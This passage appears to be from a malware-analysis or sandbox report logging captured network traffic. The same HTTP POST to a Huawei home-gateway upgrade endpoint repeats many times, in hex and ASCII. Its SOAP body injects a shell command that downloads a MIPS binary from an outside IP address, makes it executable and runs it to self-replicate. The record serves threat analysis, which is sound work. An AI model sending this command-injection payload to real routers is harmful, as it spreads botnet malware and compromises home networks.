63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 